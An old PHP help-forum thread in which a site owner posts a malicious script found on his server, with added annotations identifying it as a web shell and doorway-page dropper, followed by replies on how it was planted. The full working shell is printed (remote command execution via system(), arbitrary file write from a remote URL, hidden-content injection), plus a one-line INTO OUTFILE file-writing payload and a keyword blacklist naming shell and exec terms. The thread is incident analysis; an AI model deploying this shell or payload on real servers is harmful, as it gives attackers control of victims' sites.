dreamwest Posted September 17, 2009 Share Posted September 17, 2009 Its been a while since ive had a security breach but Heres something i found on my server today, im assuming is a brute force attack on login form, and its trying to write to .htaccess (permissions now 444). Any ideas on what else it might do?? <?php
/*
 * IR note (reviewer): this is the file the poster found on the server, kept
 * verbatim and only annotated. It contains no login logic, so it is not a
 * brute-force tool: it is a web shell / doorway-page dropper driven entirely
 * by request parameters (see Main() at the bottom for the dispatch table).
 *
 * Capabilities visible in the code: arbitrary OS command execution (Com),
 * arbitrary file write from a caller-supplied path or URL (Update, WrTest),
 * creation of random-named directories filled with .htaccess, 2.js and
 * generated .php pages (Gen, GenNew, Gen2), and injection of hidden content
 * into an existing page of the site (MRepl, undone by Clear2).
 *
 * Artefacts worth searching for on the host: files named c, m, 1t, log,
 * 1r.txt, 2r.txt and w.txt next to this script; directories with random
 * five-letter names containing a .htaccess, a 2.js and many .php pages; and
 * <dd4>...<dd5> / <!--dd4-->...<!--dd5--> blocks wrapping a zero-size <font>
 * element inside legitimate pages. A request for this file with no recognised
 * parameter answers with the literal "<ok>" (echoed in Main), which is a cheap
 * thing to grep for in proxy/WAF logs or response captures.
 */
ignore_user_abort(1); // keep running even if the client disconnects
set_time_limit(0);    // remove the execution time limit

// Deletes the script's own state files. Triggered by parameter "cl".
function Clear() {
    unlink("c");
    unlink("1r.txt");
    unlink("2r.txt");
    unlink("log");
}

// Reverses MRepl(): reads a page path from the local file "m" (taken relative
// to the parent directory), strips the dd4/dd5 marker blocks, any "_lm"
// anchors, "http...tmp6...</a>" runs and the zero-size <font> tag, then writes
// the page back. Triggered by parameter "cl2".
function Clear2() {
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
    $fin = ereg_replace("<!--dd5-->", "", $fin);
    $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

// Copies request parameter $name into $var (GET wins over POST) and returns
// whether it was non-empty. No validation of any kind is performed.
function GetVar($name, &$var) {
    $var = "";
    if (isset($_POST[$name])) $var = $_POST[$name];
    if (isset($_GET[$name])) $var = $_GET[$name];
    if (($var) =="") return false; else return true;
}

// Doorway-page generator, variant "g1". "sg" is a caller-supplied base path
// or URL: "<sg>2.txt" becomes the .htaccess of a new random five-letter
// directory (recorded in "c"), and "<sg>sgen.php" is fetched ten times as a
// page template. Each fetched page is split on "</html>"; the text after it
// names a sub-directory and the page is written as "<dir>/<name>/<name>.php",
// with the path appended to "1r.txt". Because fopen() is used, "sg" may be a
// remote URL, so whatever the remote side serves is written into .php files.
// Note $pid is only assigned in the first-run branch; on later runs the loop
// bound is built from an unset variable.
function GenNew() {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"])) $sg = $_POST["sg"];
    if (isset($_GET["sg"])) $sg = $_GET["sg"];
    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c")) {
        $fconf = file("c");
        $tname = trim($fconf[0]);
    } else {
        $fconf = fopen("c", "w+");
        $rnd = mt_rand(0, 999);
        $nm = "";
        for ($i=0; $i<5; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        mkdir($tname);
        fwrite($fconf, $tname);
        $pid = 0;
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
    }
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++) {
        $fc = "";
        $fp = fopen($gname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $arr = explode("</html>", $fin);
        //print_r($arr);
        $curs = trim($arr[1]);
        $newf = "$tname/$curs/";
        echo "$newf";
        mkdir($newf);
        $fnd = fopen("$tname/$curs/$curs".".php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        fwrite($fr, "$tname/$curs/$curs".".php\n");
    }
}

// Doorway-page generator, variant "g2". First run: creates the random
// directory, fetches "<sg>2.txt" into its .htaccess, "<sg>2js.txt" into
// "<dir>/2.js" and "<sg>1t.php" into the local list file "1t" (one page name
// per line); the cursor into that list ($i_dor) is persisted as line 2 of "c".
// Each call fetches "<sg>sgen2.php?th=<name>" for the next ten names, fills the
// "<LINKS2>" placeholder with a list of links to sibling pages (22 random ones,
// or 75 sequential ones for the four index pages at cursor 196-199) and writes
// "<dir>/<name>.php". With parameter "md" set, the written paths are recorded
// in "1r.txt" (index pages) or "2r.txt" (the rest). Same unset-$pid issue as
// GenNew() on runs where "c" already exists.
function Gen2() {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    $md = false;
    if (isset($_POST["sg"])) $sg = $_POST["sg"];
    if (isset($_GET["sg"])) $sg = $_GET["sg"];
    if (isset($_GET["md"])) $md = true;
    $path = "";
    $fr = fopen("1r.txt", "a+");
    $f2r = fopen("2r.txt", "a+");
    if (file_exists("c")) {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $i_dor = trim($fconf[1]);
        $i_dor = $i_dor+0;
    } else {
        $fconf = fopen("c", "w+");
        $rnd = mt_rand(0, 999);
        $nm = "";
        for ($i=0; $i<5; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        mkdir($tname);
        fwrite($fconf, $tname."\n");
        fwrite($fconf, "0\n");
        $pid = 0;
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $fht = fopen("$tname/2.js", "w+");
        $htname = $sg."2js.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $f1t = fopen("1t", "w+");
        $f1tname = $sg."1t.php";
        $fp = fopen($f1tname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($f1t, $fin);
        fclose($f1t);
    }
    $i_dor++;
    $i_dor--;
    $a1t = file("1t");
    $gname = $sg."sgen2.php";
    for ($j=$pid; $j<$pid+10; $j++) {
        $cth = trim($a1t[$i_dor]);
        $i_dor++;
        $fc = "";
        $fp = fopen($gname."?th=$cth", "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $links ="";
        if (($i_dor<196) || ($i_dor>199)) {
            for ($y=0; $y<22; $y++) {
                $rndi = mt_rand(0,299);
                $rth = trim($a1t[$rndi]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        if ($i_dor==196) {
            for ($y=0; $y<75; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        if ($i_dor==197) {
            for ($y=75; $y<150; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        if ($i_dor==198) {
            for ($y=150; $y<225; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        if ($i_dor==199) {
            for ($y=225; $y<300; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a></li> \n";
            }
        }
        $fin = ereg_replace("<LINKS2>", $links, $fin);
        $curs = $cth;
        $fnd = fopen("$tname/$curs".".php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        if (($md) && ($i_dor==196 || $i_dor==197 || $i_dor==198 || $i_dor==199)) {
            fwrite($fr, "$tname/$curs".".php\n");
        }
        if (($md) && ($i_dor<196 || $i_dor>199) ) {
            fwrite($f2r, "$tname/$curs".".php\n");
        }
    }
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n".$i_dor."\n");
    fclose($fconf);
}

// Doorway-page generator, variant "g" (the page key comes from parameter
// "gm"). Layout: random five-letter top directory (with a .htaccess fetched
// from "<sg>2.txt") and a random three-letter sub-directory, rotated every
// 100 pages. Each call fetches "<sg>sgen.php?g=<gm>" ten times and writes
// "<gm>_<j>.php"; when the counter reaches 100 it also fetches the "&m=1"
// variant, writes "<gm>_lm.php" and records that path in "1r.txt". State
// (top dir, sub dir, key, counter) is kept as four lines in "c".
function Gen() {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"])) $sg = $_POST["sg"];
    if (isset($_GET["sg"])) $sg = $_GET["sg"];
    if (isset($_POST["gm"])) $g = $_POST["gm"];
    if (isset($_GET["gm"])) $g = $_GET["gm"];
    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c")) {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100) {
            $pid = 0;
            $rnd = mt_rand(0, 999);
            $nm = "";
            for ($i=0; $i<3; $i++) {
                $ran = mt_rand(0,26);
                $sym = $alp[$ran];
                $nm = $nm.$sym;
            }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    } else {
        $rnd = mt_rand(0, 999);
        $nm = "";
        for ($i=0; $i<5; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $rnd = mt_rand(0, 999);
        $nm = "";
        for ($i=0; $i<3; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $cname = $nm;
        mkdir("$tname/$cname");
    }
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++) {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }
    // Runs once, after the loop, on the call that brings the counter to 100.
    if ($j==100) {
        $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.php";
        fwrite($fr,"$map\n");
    }
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}

// Arbitrary file write, parameter "u": reads whatever path or URL "u" names
// and stores it as "<name>.php" in the script's directory. This is how the
// operator replaces this file or drops additional ones. If "name" is absent
// the target is literally ".php".
function Update() {
    if (isset($_GET["name"])) $sname = $_GET["name"];
    $thisname = "$sname.php";
    if (isset($_POST['u'])) $u = $_POST['u'];
    if (isset($_GET['u'])) $u = $_GET['u'];
    $fp = fopen($u, "r");
    $fin = '';
    while (!feof($fp)) {
        $fc = fgets($fp, 1024);
        if (!$fc) break;
        $fin .= $fc;
    }
    fclose($fp);
    $fthis = fopen($thisname, "w+");
    fwrite($fthis, $fin);
    fclose($fthis);
}

// Remote command execution, parameter "c": the raw value is passed to
// system() with errors suppressed. Anything the web server user can run,
// the caller can run.
function Com() {
    if (isset($_POST['c'])) @system($_POST['c']);
    if (isset($_GET['c'])) @system($_GET['c']);
}

// Hidden-content injection, parameter "s": takes the page named in local file
// "m" (relative to the parent directory), strips its </body></html>, and
// appends the contents of the path/URL given in "mpt" wrapped in a zero-size
// <font> element between <dd4>/<dd5> markers, then re-closes the document.
// The visible site page therefore carries invisible, attacker-chosen markup.
function MRepl() {
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";
    $endtag = "</font></body></html><dd5> ";
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt); // (the original comment here was mis-encoded and unreadable)
    $fin = preg_replace ("/<\/body>/i", "", $fin);
    $fin = preg_replace ("/<\/html>/i", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
    $drs = '';
    while (!feof($fp)) {
        $fc = fgets($fp, 1024);
        if (!$fc) { exit(); }
        $drs .= $fc;
    }
    fclose($fp);
    $fin = $fin.$begtag;
    $fin = $fin.$drs;
    $fin = $fin.$endtag;
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

// Parameter "wr": copies "<wr>w.txt" to a local "w.txt". Presumably a probe
// that the directory is writable and that fetching from "wr" works.
function WrTest() {
    $path = trim($_GET['wr']);
    $htname = $path."w.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp)) {
        $fc = fgets($fp, 1024);
        if (!$fc) break;
        $fin .= $fc;
    }
    fclose($fp);
    ;
    $fout = fopen("w.txt", "w+");
    fwrite($fout, $fin);
    fclose($fout);
}

// Dispatch on the first matching request parameter (POST or GET); each
// handler exits. With no recognised parameter the script answers "<ok>",
// which serves as a liveness fingerprint for whoever planted it.
function Main() {
    if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); }
    if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); }
    if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); }
    if (isset($_POST['g1']) || isset($_GET['g1'])) { GenNew(); exit(); }
    if (isset($_POST['g2']) || isset($_GET['g2'])) { Gen2(); exit(); }
    if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); }
    if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); }
    if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); }
    if (isset($_POST['wr']) || isset($_GET['wr'])) { WrTest(); exit(); }
    echo "<ok>";
}
Main();
?> Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/ Share on other sites More sharing options...
.josh Posted September 17, 2009 Share Posted September 17, 2009 Well, for one thing, you aren't validating any GET or POST vars. At least, not in that script. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920138 Share on other sites More sharing options...
MadTechie Posted September 17, 2009 Share Posted September 17, 2009 The fact that someone got a PHP file onto your server proves you need to write some security. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920327 Share on other sites More sharing options...
dreamwest Posted September 17, 2009 Author Share Posted September 17, 2009 well for one thing, you aren't validating any GET or POST vars. At least, not in that script. I use strip tags and str_replate to sanitize it, and i know that not nearly enough. Ive added this , ill see if that stops it:
// NOTE(review): nothing below bears on how a PHP file and a directory were
// written to the server; that is an upload/FTP/hosting question (see the
// replies), not a login-input filtering one. Reading $_POST keys without an
// isset() check also raises a notice whenever the field is missing.
$username = substr(trim($_POST['username']),0,20);
// prevent SQL-injection
// NOTE(review): only backslash and double quote are escaped; a single quote,
// the usual SQL string delimiter, passes through untouched. Escaping here is
// not a substitute for a parameterised query at the point of use.
$username = str_replace('\\','\\\\', $username);
$username = str_replace('"','\"', $username);
// prevent XSS-attack, Shell-execute and JavaScript execution
// NOTE(review): keyword blacklists silently blank legitimate input (for
// example "Shelley" matches /shell/i, "Filemon" matches /File/i, "executive"
// matches /EXEC/i) and the user gets an empty credential instead of an error.
if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$username)) { $username = ''; }
if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$username)) { $username = ''; }
if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$username)) { $username = ''; }
if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$username)) { $username = ''; }
// NOTE(review): the password is truncated to 20 characters and then subjected
// to the same substitutions and blacklists, so a password containing any of
// those words (or longer than 20 characters) is altered before it is checked.
$password = substr(trim($_POST['password']),0,20);
// prevent SQL-injection
$password = str_replace('\\','\\\\', $password);
$password = str_replace('"','\"', $password);
// prevent XSS-attack, Shell-execute and JavaScript execution
if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$password)) { $password = ''; }
if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$password)) { $password = ''; }
if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$password)) { $password = ''; }
if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$password)) { $password = ''; }
Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920415 Share on other sites More sharing options...
MadTechie Posted September 17, 2009 Share Posted September 17, 2009 /*No Comment*/ Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920417 Share on other sites More sharing options...
corbin Posted September 17, 2009 Share Posted September 17, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920428 Share on other sites More sharing options...
dreamwest Posted September 18, 2009 Author Share Posted September 18, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. I don't get how they can add not only a PHP file but a directory; my FTP password is 20 mixed characters, and I change it every 3 months. I clean POST, GET and REQUEST data using strip_tags and str_replace, and database queries with mysql_real_escape_string(). I'm out of ideas on how else they could do it. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920482 Share on other sites More sharing options...
corbin Posted September 18, 2009 Share Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it? Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920497 Share on other sites More sharing options...
dreamwest Posted September 18, 2009 Author Share Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it? I do; I allow people to upload videos only... and it's the only place I haven't checked. I'll do it now. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920516 Share on other sites More sharing options...
play_ Posted September 18, 2009 Share Posted September 18, 2009 Post a link. I'd like to see this video upload form Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920519 Share on other sites More sharing options...
waynew Posted September 19, 2009 Share Posted September 19, 2009 Upload script is probably vulnerable. Either that or your hosting is to blame. I'd go with the latter. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921210 Share on other sites More sharing options...
xylex Posted September 20, 2009 Share Posted September 20, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. Not true. SELECT "<?php phpinfo();" INTO OUTFILE hack.php; Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921588 Share on other sites More sharing options...
corbin Posted September 20, 2009 Share Posted September 20, 2009 Hrmmm, true. I forgot about INTO OUTFILE. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921593 Share on other sites More sharing options...
roopurt18 Posted September 20, 2009 Share Posted September 20, 2009 I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months. And FTP information is sent in plain text from your machine to the server, so the length of the password and how often you change it don't help if it can be read in transit. Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921603 Share on other sites More sharing options...